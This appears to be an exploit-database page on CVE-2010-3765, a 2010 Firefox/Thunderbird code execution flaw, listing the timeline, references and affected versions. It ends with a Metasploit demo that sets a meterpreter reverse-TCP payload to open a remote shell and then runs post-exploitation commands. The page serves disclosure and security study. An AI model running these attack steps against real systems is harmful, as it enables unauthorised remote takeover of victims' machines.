Cve-2010-3765 : Mozilla Firefox Interleaving Document.Write And Appendchild Exploit

Vulnerability discovered in the wild
Vulnerability corrected by vendor the 2010-10-27
Vulnerability & Exploit-DB PoC disclosed by unknown the 2010-10-29
Metasploit PoC released the 2011-02-17

PoC provided by:
unknown
scriptjunkie

Reference(s) :
CVE-2010-3765
MFSA 2010-73
EDB-ID-15352
OSVDB-ID-68905

Affected versions :
All Firefox 3.6.x versions previous version 3.6.12
All Firefox 3.5.x versions previous version 3.5.15
All Thunderbird 3.1.x versions previous version 3.1.6
All Thunderbird 3.0.x versions previous version 3.0.10
All SeaMonkey 2.0.x versions previous version 2.0.10

Tested on Windows XP SP3 with Firefox 3.6.9 released the 2010-09-23

Description :
This module exploits a code execution vulnerability in Mozilla Firefox caused by interleaved calls to document.write and appendChild. This exploit is a metasploit port of the in-the-wild exploit.

Metasploit demo :

use exploit/windows/browser/mozilla_interlea­ved_write
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit


sessions -i 1
getuid
sysinfo
ipconfig